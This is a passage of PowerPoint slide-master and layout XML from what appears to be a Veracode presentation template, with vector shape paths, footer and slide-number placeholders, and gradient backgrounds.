                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2891D088-3BFB-A866-90DE-1E3D07E9B6A2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7861538" y="1289301"/>
                <a:ext cx="870505" cy="659273"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 6882765 w 8137207"/>
                  <a:gd name="connsiteY0" fmla="*/ 6059805 h 6162675"/>
                  <a:gd name="connsiteX1" fmla="*/ 6882765 w 8137207"/>
                  <a:gd name="connsiteY1" fmla="*/ 1292543 h 6162675"/>
                  <a:gd name="connsiteX2" fmla="*/ 5945505 w 8137207"/>
                  <a:gd name="connsiteY2" fmla="*/ 1292543 h 6162675"/>
                  <a:gd name="connsiteX3" fmla="*/ 5945505 w 8137207"/>
                  <a:gd name="connsiteY3" fmla="*/ 103823 h 6162675"/>
                  <a:gd name="connsiteX4" fmla="*/ 6882765 w 8137207"/>
                  <a:gd name="connsiteY4" fmla="*/ 103823 h 6162675"/>
                  <a:gd name="connsiteX5" fmla="*/ 7218998 w 8137207"/>
                  <a:gd name="connsiteY5" fmla="*/ 103823 h 6162675"/>
                  <a:gd name="connsiteX6" fmla="*/ 8137208 w 8137207"/>
                  <a:gd name="connsiteY6" fmla="*/ 103823 h 6162675"/>
                  <a:gd name="connsiteX7" fmla="*/ 8137208 w 8137207"/>
                  <a:gd name="connsiteY7" fmla="*/ 1292543 h 6162675"/>
                  <a:gd name="connsiteX8" fmla="*/ 8137208 w 8137207"/>
                  <a:gd name="connsiteY8" fmla="*/ 4871085 h 6162675"/>
                  <a:gd name="connsiteX9" fmla="*/ 8137208 w 8137207"/>
                  <a:gd name="connsiteY9" fmla="*/ 6059805 h 6162675"/>
                  <a:gd name="connsiteX10" fmla="*/ 6882765 w 8137207"/>
                  <a:gd name="connsiteY10" fmla="*/ 6059805 h 6162675"/>
                  <a:gd name="connsiteX11" fmla="*/ 3089910 w 8137207"/>
                  <a:gd name="connsiteY11" fmla="*/ 4974908 h 6162675"/>
                  <a:gd name="connsiteX12" fmla="*/ 1255395 w 8137207"/>
                  <a:gd name="connsiteY12" fmla="*/ 3081338 h 6162675"/>
                  <a:gd name="connsiteX13" fmla="*/ 3089910 w 8137207"/>
                  <a:gd name="connsiteY13" fmla="*/ 1187768 h 6162675"/>
                  <a:gd name="connsiteX14" fmla="*/ 4924425 w 8137207"/>
                  <a:gd name="connsiteY14" fmla="*/ 3105150 h 6162675"/>
                  <a:gd name="connsiteX15" fmla="*/ 3089910 w 8137207"/>
                  <a:gd name="connsiteY15" fmla="*/ 4974908 h 6162675"/>
                  <a:gd name="connsiteX16" fmla="*/ 3089910 w 8137207"/>
                  <a:gd name="connsiteY16" fmla="*/ 0 h 6162675"/>
                  <a:gd name="connsiteX17" fmla="*/ 0 w 8137207"/>
                  <a:gd name="connsiteY17" fmla="*/ 3081338 h 6162675"/>
                  <a:gd name="connsiteX18" fmla="*/ 3089910 w 8137207"/>
                  <a:gd name="connsiteY18" fmla="*/ 6162675 h 6162675"/>
                  <a:gd name="connsiteX19" fmla="*/ 6178868 w 8137207"/>
                  <a:gd name="connsiteY19" fmla="*/ 3095625 h 6162675"/>
                  <a:gd name="connsiteX20" fmla="*/ 3089910 w 8137207"/>
                  <a:gd name="connsiteY20" fmla="*/ 0 h 616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37207" h="6162675">
                    <a:moveTo>
                      <a:pt x="6882765" y="6059805"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6882765" y="1292543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5945505" y="1292543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5945505" y="103823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6882765" y="103823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7218998" y="103823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8137208" y="103823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8137208" y="1292543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8137208" y="4871085"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8137208" y="6059805"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6882765" y="6059805"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="3089910" y="4974908"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1824038" y="4974908"/>
                      <a:pt x="1255395" y="3867150"/>
                      <a:pt x="1255395" y="3081338"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1255395" y="2294573"/>
                      <a:pt x="1824038" y="1187768"/>
                      <a:pt x="3089910" y="1187768"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4425315" y="1187768"/>
                      <a:pt x="4924425" y="2364105"/>
                      <a:pt x="4924425" y="3105150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4923473" y="3880485"/>
                      <a:pt x="4353878" y="4974908"/>
                      <a:pt x="3089910" y="4974908"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="3089910" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1386840" y="0"/>
                      <a:pt x="0" y="1382078"/>
                      <a:pt x="0" y="3081338"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="4780598"/>
                      <a:pt x="1386840" y="6162675"/>
                      <a:pt x="3089910" y="6162675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4792028" y="6162675"/>
                      <a:pt x="6178868" y="4787265"/>
                      <a:pt x="6178868" y="3095625"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6178868" y="1360170"/>
                      <a:pt x="4821555" y="0"/>
                      <a:pt x="3089910" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grpFill/>
              <a:ln w="9525" cap="flat">
                <a:noFill/>
                <a:prstDash val="solid"/>
                <a:miter/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" b="0" i="0">
                  <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FEF06BE-6D56-6DE1-1406-2D924A8A8F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{446E67FC-D985-4C9C-FC71-5E1FAD303C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B213681-7F96-7932-DD80-29E93965DC0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="307640"/>
            <a:ext cx="11454980" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144591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1_Content_Light_Title">
    <p:bg>
      <p:bgPr>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect l="-109000" r="70000"/>
          </a:stretch>
        </a:blip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4D47932-3EE7-9346-9457-27A634E85046}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{544B728F-7D9D-CA44-97D8-5634DF8271BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5B3B6D-19C7-BD29-FBE3-FDC9B624277E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5CE926-DD4A-23CA-4FA7-16EEC2B533A0}"/>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5" name="Freeform 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDB1B1D0-88FE-5652-80BF-5C636325D0B6}"/>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7" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{475694A1-B981-7407-B279-67F406413322}"/>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8" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE6B03AC-E815-F44A-4684-5DEC849304AD}"/>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9" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6E3753F-47F1-2568-5E5D-9F6227A38A9A}"/>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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3795890241"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:wipe dir="r"/>
  </p:transition>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" pos="19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7_Title_Dark_2">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="tx1"/>
            </a:gs>
            <a:gs pos="98000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="13500000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A blue background with circles&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8485698-100F-7F98-5457-AA28A9459F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="14865"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="12192"/>
            <a:ext cx="12192000" cy="6845808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FEF06BE-6D56-6DE1-1406-2D924A8A8F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{446E67FC-D985-4C9C-FC71-5E1FAD303C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89973C60-DE82-2D1D-1EA1-C05AA4AEB4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7469529" y="0"/>
            <a:ext cx="4722471" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="53000">
                <a:schemeClr val="accent4">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1097891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8_Title_Dark_2">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="tx1"/>
            </a:gs>
            <a:gs pos="98000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="13500000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A blue background with circles&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8485698-100F-7F98-5457-AA28A9459F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="14865"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="12192"/>
            <a:ext cx="12192000" cy="6845808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FEF06BE-6D56-6DE1-1406-2D924A8A8F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{446E67FC-D985-4C9C-FC71-5E1FAD303C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89973C60-DE82-2D1D-1EA1-C05AA4AEB4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096001" y="0"/>
            <a:ext cx="6096000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="53000">
                <a:schemeClr val="accent4">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40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Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278303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35.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme3.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout37.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout36.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1"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2" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2EB9A8-796F-A54A-A124-B8DEA39D67F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1100" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
